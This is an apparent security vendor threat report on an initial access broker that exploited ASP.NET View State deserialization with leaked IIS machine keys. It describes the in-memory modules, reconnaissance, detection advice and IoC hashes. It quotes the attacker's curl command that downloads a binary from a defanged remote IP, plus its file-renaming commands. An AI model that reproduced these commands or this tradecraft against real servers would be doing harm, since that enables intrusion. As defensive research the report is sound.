Initial Access Broker In-Memory IIS Modules Revealed

The IAB used these leaked keys to sign malicious payloads that provide unauthorized access to targeted servers, in a technique called ASP.NET View State deserialization. This technique enabled the IAB to execute malicious payloads directly in server memory, minimizing their on-disk presence and leaving few forensic artifacts, making detection more challenging.

We attribute the temporary group TGR-CRI-0045, with medium confidence, to Gold Melody (aka UNC961, Prophet Spider). This assessment is based on overlaps in the following:

• Indicators of compromise (IoCs)
• Tactics, techniques and procedures (TTPs)
• Victimology

This report also analyzes TGR-CRI-0045’s infrastructure, as well as the tooling it used to gather information about other systems on the network and maintain access to the exploited systems. The tooling appears to be under active development.

The earliest evidence of exploitation and tool deployment was in October 2024, with a significant increase in activity between late January and March 2025. This surge included deploying post-exploitation tools such as open-source port scanners and custom-built utilities for persistence (maintaining access) and privilege escalation (gaining higher-level access).

Between Jan. 30 and Feb. 2, 2025, we responded to web server intrusions in two customer environments. In both cases, the intrusions involved command shell execution originating from an IIS worker process (w3wp.exe). These intrusions exhibited the following common characteristics:

• cmd.exe invocation using stdout and stderr output redirection: cmd /c your_command_here 2>&1
• Staging directory: C:\Windows\Temp\111t
• File retrieved via curl from: hxxp://195.123.240[.]233:443/atm

Unexpectedly, the investigation of affected endpoints revealed no recently uploaded web shells. However, expanding the investigation revealed the same cmd.exe invocation and staging directory misuse in other tenants’ hands-on-keyboard intrusions.

Understanding TGR-CRI-0045’s access requires explaining the roles of IIS, ASP.NET, View State and how compromised key material enables remote code execution. IIS is a web server supporting various web application technologies, including ASP.NET. This framework allows developers to create dynamic, server-side applications using .NET languages like C# and VB.NET.

ASP.NET websites use View State to manage interactions between a user’s browser and the server. View State maintains the state of frontend controls (e.g., checkboxes and input fields) between requests, storing this information in a hidden HTTP parameter named __VIEWSTATE, included in all requests. This parameter is vulnerable to various .NET deserialization techniques that can enable remote code execution if the attacker knows the key used to protect it.

In compromised environments, we identified subsets of the following five .NET assemblies loaded into memory following successful View State exploitation:

• Cmd /c: We identified three sub-variants, each using different HTTP parameters to pass a command to the system’s command shell. This allowed the attacker to execute arbitrary commands on the server.
• File upload: This allowed the attacker to upload files to the server by specifying a target file path and a byte buffer containing the file’s contents.
• Winner: This was likely an exploitation check, reporting back u a win to the attacker, confirming successful exploitation.
• File download: (Unrecovered) Based on imported functions, this module appears to be a downloader, enabling the attacker to retrieve sensitive data from the compromised server.
• Reflective loader: (Unrecovered) Based on imported functions, this module appears to be a reflective loader, allowing the attacker to dynamically load and execute additional .NET assemblies in memory without writing them to disk.

The recovered assemblies share common data handling characteristics. They appear to use a simple single-character XOR key x to decrypt payloads embedded within HTTP parameters.

The assemblies also appear to call httpContext.response.Flush() followed by httpContext.response.End() to terminate HTTP responses. This likely reduces the amount of forensic data generated when ASP.NET fails to correctly deserialize the malicious payloads, making detection and incident response more challenging.

Between October 2024 and January 2025, the threat actor’s activity primarily focused on exploiting systems, deploying modules — like the exploit checker — and performing basic shell reconnaissance.

Post-exploitation activity has primarily involved reconnaissance of the compromised host and surrounding network. We had observed no lateral movement as of early June.

A consistent characteristic across all observed intrusions was TGR-CRI-0045 using C:\Windows\Temp\111t as a staging directory for tools and data. In a few isolated instances, we observed the threat actor interacting with the C:\Windows\Temp\gen_py directory but found no evidence of them storing tools or exfiltrated data there.

The threat actor primarily achieved local privilege escalation using a custom C# binary named updf. This name was likely used to disguise the file as the PDF editor UPDF.

Most observed intrusions involved using wget or curl to download an ELF binary named atm. If the attacker used curl, it was likely pre-existing on the hosts. If they used wget.exe, it was likely uploaded to the target servers by executing the file upload payload. This atm binary might support malicious activities on Linux servers, should lateral movement occur. The following is an example of a curl command used to download the atm binary:

• curl hxxp://195.123.240[.]233:443/atm

Over a five-minute period, the threat actor performed local and network reconnaissance via the command shell assembly, using the following commands:

Table 1 shows the reconnaissance commands.

Table 1. Threat actor’s reconnaissance commands.

The file upload assembly sometimes uploaded executables with one-, two- or three-character filenames. It’s unclear whether this was a limitation of the assembly itself or a deliberate evasion technique by the threat actor to upload files without extensions. The attacker then used the command shell assembly to rename these files with valid extensions within the staging directory, likely to make the files appear less suspicious.

Examples of the commands used to rename the files:

• “cmd.exe” /c move c:\windows\temp\111t\tx2 c:\windows\temp\111t\txp.exe 2>&1
• “cmd.exe” /c move c:\windows\temp\111t\tx c:\windows\temp\111t\txpm.exe 2>&1
• “cmd.exe” /c move c:\windows\temp\111t\w c:\windows\temp\111t\wget.exe 2>&1

After executing their tools and reconnaissance, the threat actor deleted any remaining on-disk tools and the 111t directory.

Based on overlaps in IoCs, TTPs and victimology, we assess with medium confidence that TGR-CRI-0045 is linked to Gold Melody.

TGR-CRI-0045 has targeted organizations in Europe and the U.S. The group seems to follow an opportunistic approach that is consistent with their attack vector. Since the beginning of the identified activity, the group has targeted organizations from the following industries, most of them based in the U.S.:

• Securities and investment services
• Manufacturing – building supplies
• Manufacturing – clay refractories
• Manufacturing – surgical/medical instruments
• Wholesale and retail
• High tech
• Transportation and logistics
• Prepackaged software services
• Data processing and preparation
• Financial services
• Used goods/merchandise resalers
• Custom computer programming services

In-memory IIS tradecraft significantly hinders detection. Without proper telemetry, View State deserialization attacks are virtually invisible. Remediation typically occurs only when new Machine Keys are generated or the server is decommissioned. This allows threat actors, particularly IABs, to maintain long-term, low-footprint access to a pool of compromised systems.

Although View State deserialization payloads can be delivered via a URI parameter in a GET request, attackers typically include the __VIEWSTATE parameter within a POST request. Due to their size and potential sensitivity, POST requests are rarely logged by IIS servers, proxies, load balancers or security appliances.

Consider implementing solutions that conditionally filter and log POST requests. Options include the following:

• Custom logging rules
• Web observability frameworks
• Endpoint detection and response agents
• Network security appliances

Windows might log View State deserialization failures as Event ID 1316 in the ASP.NET event log. Review these logs and check for malicious binaries in failed View State payloads. View States containing binaries or encrypted data (when View State encryption is disabled) are highly suspicious.

TGR-CRI-0045 uses a simplistic approach to View State exploitation, loading a single, stateless assembly directly. Each command execution requires re-exploitation and re-uploading the assembly (e.g., running the file upload assembly multiple times). The same applies to executing a new directory listing or a new process. The assembly, parameters and exploit code are submitted and executed, and the results are returned through a single request. This single-shot approach limits the attacker’s ability to interact with the compromised system.

Even if TGR-CRI-0045 does not deploy a persistent web shell (backed by disk or memory) via View State exploitation, defenders need to be aware of the following:

IIS Machine Keys are fundamental cryptographic components used to authenticate and encrypt client-server data. They are essential for View State deserialization exploits.

If you suspect a View State deserialization exploit, check your IIS application for the following:

This investigation reveals how TGR-CRI-0045 leverages in-memory IIS techniques for persistent access. Exploiting ASP.NET View State deserialization vulnerabilities via exposed Machine Keys allows minimal on-disk presence and enables long-term access.

The group’s opportunistic targeting and ongoing tool development highlight the need for organizations to prioritize identifying and remediating compromised Machine Keys, as outlined by Microsoft. The single-shot nature of the exploit and limitations of traditional telemetry show the need for conditional POST request logging and careful ASP.NET event log analysis. These measures aid detection and response when endpoint solutions lack visibility into such attacks

Palo Alto Networks customers are better protected from the threats discussed above through the following products:

Reflective .NET assembly hashes:

• 106506ebc7156be116fe5d2a4d662917ddbbfb286007b6ee7a2b01c9536b1ee4
• 87bd7e24af5f10fe1e01cfa640ce26e9160b0e0e13488d7ee655e83118d16697
• 55656f7b2817087183ceedeb4d9b78d3abee02409666bffbe180d6ea87ee20fb
• 18a90b3702776b23f87738b26002e013301f60d9801d83985a57664b133cadd1
• d5d0772cb90d54ac3e3093c1ea9fcd7b878663f7ddd1f96efea0725ce47d46d5
• b3c085672ac34f1b738879096af5fcd748953116e319367e6e371034366eaeca
• File sizes: Various
• File types: Executables (DLL)
• File description: Hashes of compiled assemblies observed
• Run method: Loaded by IIS upon deserialization

Post-exploitation tooling dropped to disk: